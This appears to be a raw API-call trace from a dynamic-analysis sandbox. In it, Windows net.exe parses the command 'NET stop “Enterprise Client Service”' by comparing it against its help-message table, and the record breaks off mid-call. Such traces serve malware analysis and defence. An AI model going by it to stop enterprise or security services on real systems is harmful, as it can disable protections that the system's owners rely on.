[0120.081] LocalFree (hMem=0x4c5510) returned 0x0 [0120.081] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x483 [0120.081] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="SYNTAX\r\nThe following conventions ar", _MaxCount=0x24) returned -5 [0120.081] LocalFree (hMem=0x4c5510) returned 0x0 [0120.081] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0xa86 [0120.081] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="NAMES\r\nThe following types of names ", _MaxCount=0x24) returned 4 [0120.081] LocalFree (hMem=0x4c5510) returned 0x0 [0120.081] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x54 [0120.081] _wcsnicmp (_String1="NET stop “Enterprise Client Service”", _String2="\r\nFor more information on tools see ", _MaxCount=0x24) returned 97 [0120.081] LocalFree (hMem=0x4c5510) returned 0x0 [0120.082] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0xad [0120.082] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF", _MaxCount=0x1b) returned 18 [0120.082] LocalFree (hMem=0x4c5510) returned 0x0 [0120.082] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x2e [0120.082] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET COMPUTER\r\n\\\\computernam", _MaxCount=0x1b) returned 16 [0120.082] LocalFree (hMem=0x4c5510) returned 0x0 [0120.082] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x7d [0120.082] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET CONFIG SERVER\r\n[/AUTODI", _MaxCount=0x1b) returned 16 [0120.082] LocalFree (hMem=0x4c5510) returned 0x0 [0120.082] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x26 [0120.082] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET CONFIG\r\n[SERVER | WORKS", _MaxCount=0x1b) returned 16 [0120.082] LocalFree (hMem=0x4c5510) returned 0x0 [0120.082] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x19 [0120.082] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x1b) returned 16 [0120.082] LocalFree (hMem=0x4c5510) returned 0x0 [0120.082] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x1b [0120.082] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x1b) returned 13 [0120.082] LocalFree (hMem=0x4c5510) returned 0x0 [0120.082] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0xbe [0120.082] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET GROUP\r\n[groupname [/COM", _MaxCount=0x1b) returned 12 [0120.082] LocalFree (hMem=0x4c5510) returned 0x0 [0120.082] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x33 [0120.082] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET HELP\r\ncommand\r\n -or", _MaxCount=0x1b) returned 11 [0120.082] LocalFree (hMem=0x4c5510) returned 0x0 [0120.082] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x19 [0120.082] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x1b) returned 11 [0120.083] LocalFree (hMem=0x4c5510) returned 0x0 [0120.083] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0xc1 [0120.083] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET LOCALGROUP\r\n[groupname ", _MaxCount=0x1b) returned 7 [0120.083] LocalFree (hMem=0x4c5510) returned 0x0 [0120.083] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x16 [0120.083] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x1b) returned 3 [0120.083] LocalFree (hMem=0x4c5510) returned 0x0 [0120.083] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x33 [0120.083] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET SESSION\r\n[\\\\computernam", _MaxCount=0x1b) returned 15 [0120.083] LocalFree (hMem=0x4c5510) returned 0x0 [0120.083] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x234 [0120.083] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x1b) returned 12 [0120.083] LocalFree (hMem=0x4c5510) returned 0x0 [0120.083] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x13 [0120.083] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET START BROWSER\r\n", _MaxCount=0x1b) returned 14 [0120.083] LocalFree (hMem=0x4c5510) returned 0x0 [0120.083] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x14 [0120.083] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x1b) returned 14 [0120.083] LocalFree (hMem=0x4c5510) returned 0x0 [0120.083] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x14 [0120.083] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET START EVENTLOG\r\n", _MaxCount=0x1b) returned 14 [0120.083] LocalFree (hMem=0x4c5510) returned 0x0 [0120.083] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x15 [0120.083] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET START MESSENGER\r\n", _MaxCount=0x1b) returned 14 [0120.083] LocalFree (hMem=0x4c5510) returned 0x0 [0120.083] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x15 [0120.083] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET START NET LOGON\r\n", _MaxCount=0x1b) returned 14 [0120.084] LocalFree (hMem=0x4c5510) returned 0x0 [0120.084] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x16 [0120.084] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x1b) returned 14 [0120.084] LocalFree (hMem=0x4c5510) returned 0x0 [0120.084] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x11 [0120.084] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET START RPCSS\r\n", _MaxCount=0x1b) returned 14 [0120.084] LocalFree (hMem=0x4c5510) returned 0x0 [0120.084] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x14 [0120.084] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET START SCHEDULE\r\n", _MaxCount=0x1b) returned 14 [0120.084] LocalFree (hMem=0x4c5510) returned 0x0 [0120.084] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x12 [0120.084] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET START SERVER\r\n", _MaxCount=0x1b) returned 14 [0120.084] LocalFree (hMem=0x4c5510) returned 0x0 [0120.084] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0xf [0120.084] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET START UPS\r\n", _MaxCount=0x1b) returned 14 [0120.084] LocalFree (hMem=0x4c5510) returned 0x0 [0120.084] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x17 [0120.084] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET START WORKSTATION\r\n", _MaxCount=0x1b) returned 14 [0120.084] LocalFree (hMem=0x4c5510) returned 0x0 [0120.084] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x18 [0120.084] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x1b) returned 14 [0120.084] LocalFree (hMem=0x4c5510) returned 0x0 [0120.084] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x2a [0120.084] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET STATISTICS\r\n[WORKSTATIO", _MaxCount=0x1b) returned 14 [0120.084] LocalFree (hMem=0x4c5510) returned 0x0 [0120.084] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x15 [0120.085] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x1b) returned 19 [0120.085] LocalFree (hMem=0x4c5510) returned 0x0 [0120.085] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x58 [0120.085] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET TIME\r\n\r\n[\\\\computername", _MaxCount=0x1b) returned -1 [0120.085] LocalFree (hMem=0x4c5510) returned 0x0 [0120.085] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x184 [0120.085] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET USE\r\n[devicename | *] [", _MaxCount=0x1b) returned -2 [0120.085] LocalFree (hMem=0x4c5510) returned 0x0 [0120.085] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0xc7 [0120.085] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET USER\r\n[username [passwo", _MaxCount=0x1b) returned -2 [0120.085] LocalFree (hMem=0x4c5510) returned 0x0 [0120.085] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x47 [0120.085] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET VIEW\r\n[\\\\computername [", _MaxCount=0x1b) returned -3 [0120.085] LocalFree (hMem=0x4c5510) returned 0x0 [0120.085] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0xc2 [0120.085] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NET\r\n [ ACCOUNTS | COMPU", _MaxCount=0x1b) returned 19 [0120.085] LocalFree (hMem=0x4c5510) returned 0x0 [0120.085] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x319 [0120.085] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="SERVICES\r\nNET START can be ", _MaxCount=0x1b) returned -5 [0120.085] LocalFree (hMem=0x4c5510) returned 0x0 [0120.085] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x483 [0120.085] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="SYNTAX\r\nThe following conve", _MaxCount=0x1b) returned -5 [0120.085] LocalFree (hMem=0x4c5510) returned 0x0 [0120.085] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0xa86 [0120.085] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="NAMES\r\nThe following types ", _MaxCount=0x1b) returned 4 [0120.164] LocalFree (hMem=0x4c5510) returned 0x0 [0120.164] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x54 [0120.164] _wcsnicmp (_String1="NET stop “Enterprise Client", _String2="\r\nFor more information on t", _MaxCount=0x1b) returned 97 [0120.164] LocalFree (hMem=0x4c5510) returned 0x0 [0120.164] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0xad [0120.164] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET ACCOUNTS\r\n[/FORC", _MaxCount=0x14) returned 18 [0120.164] LocalFree (hMem=0x4c5510) returned 0x0 [0120.164] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x2e [0120.164] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET COMPUTER\r\n\\\\comp", _MaxCount=0x14) returned 16 [0120.164] LocalFree (hMem=0x4c5510) returned 0x0 [0120.164] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x7d [0120.164] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET CONFIG SERVER\r\n[", _MaxCount=0x14) returned 16 [0120.164] LocalFree (hMem=0x4c5510) returned 0x0 [0120.164] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x26 [0120.164] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET CONFIG\r\n[SERVER ", _MaxCount=0x14) returned 16 [0120.164] LocalFree (hMem=0x4c5510) returned 0x0 [0120.164] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x19 [0120.165] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET CONTINUE\r\nservic", _MaxCount=0x14) returned 16 [0120.165] LocalFree (hMem=0x4c5510) returned 0x0 [0120.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x1b [0120.165] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET FILE\r\n[id [/CLOS", _MaxCount=0x14) returned 13 [0120.165] LocalFree (hMem=0x4c5510) returned 0x0 [0120.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0xbe [0120.165] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET GROUP\r\n[groupnam", _MaxCount=0x14) returned 12 [0120.165] LocalFree (hMem=0x4c5510) returned 0x0 [0120.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x33 [0120.165] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET HELP\r\ncommand\r\n ", _MaxCount=0x14) returned 11 [0120.165] LocalFree (hMem=0x4c5510) returned 0x0 [0120.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x19 [0120.165] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET HELPMSG\r\nmessage", _MaxCount=0x14) returned 11 [0120.165] LocalFree (hMem=0x4c5510) returned 0x0 [0120.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0xc1 [0120.165] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET LOCALGROUP\r\n[gro", _MaxCount=0x14) returned 7 [0120.165] LocalFree (hMem=0x4c5510) returned 0x0 [0120.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x16 [0120.165] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET PAUSE\r\nservice\r\n", _MaxCount=0x14) returned 3 [0120.165] LocalFree (hMem=0x4c5510) returned 0x0 [0120.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x33 [0120.165] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET SESSION\r\n[\\\\comp", _MaxCount=0x14) returned 15 [0120.165] LocalFree (hMem=0x4c5510) returned 0x0 [0120.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x234 [0120.165] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET SHARE\r\nsharename", _MaxCount=0x14) returned 12 [0120.165] LocalFree (hMem=0x4c5510) returned 0x0 [0120.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x13 [0120.165] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET START BROWSER\r\n", _MaxCount=0x14) returned 14 [0120.165] LocalFree (hMem=0x4c5510) returned 0x0 [0120.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x14 [0120.166] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x14) returned 14 [0120.166] LocalFree (hMem=0x4c5510) returned 0x0 [0120.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x14 [0120.166] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET START EVENTLOG\r\n", _MaxCount=0x14) returned 14 [0120.166] LocalFree (hMem=0x4c5510) returned 0x0 [0120.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="唐L⡋盺\x18唐L\x18") returned 0x15 [0120.166] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET START MESSENGER\r", _MaxCount=0x14) returned 14 [0120.166] LocalFree (hMem=0x4c5510) returned 0x0 [0120.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="甐L⡋盺\x18唐L\x18") returned 0x15 [0120.166] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET START NET LOGON\r", _MaxCount=0x14) returned 14 [0120.166] LocalFree (hMem=0x4c7510) returned 0x0 [0120.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18甐L\x18") returned 0x16 [0120.166] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET START RPCLOCATOR", _MaxCount=0x14) returned 14 [0120.166] LocalFree (hMem=0x4c9510) returned 0x0 [0120.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0x11 [0120.166] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET START RPCSS\r\n", _MaxCount=0x14) returned 14 [0120.166] LocalFree (hMem=0x4c9510) returned 0x0 [0120.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0x14 [0120.166] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET START SCHEDULE\r\n", _MaxCount=0x14) returned 14 [0120.166] LocalFree (hMem=0x4c9510) returned 0x0 [0120.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0x12 [0120.166] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET START SERVER\r\n", _MaxCount=0x14) returned 14 [0120.166] LocalFree (hMem=0x4c9510) returned 0x0 [0120.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0xf [0120.166] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET START UPS\r\n", _MaxCount=0x14) returned 14 [0120.166] LocalFree (hMem=0x4c9510) returned 0x0 [0120.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0x17 [0120.166] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET START WORKSTATIO", _MaxCount=0x14) returned 14 [0120.166] LocalFree (hMem=0x4c9510) returned 0x0 [0120.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: lpBuffer="锐L⡋盺\x18锐L\x18") returned 0x18 [0120.167] _wcsnicmp (_String1="NET stop “Enterprise", _String2="NET START\r\n[service]", _MaxCount=0x14) returned 14 [0120.167] LocalFree (hMem=0x4c9510) returned 0x0 [0120.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x18f5e8, nSize=0x0, Arguments=0x18f5e4 | out: 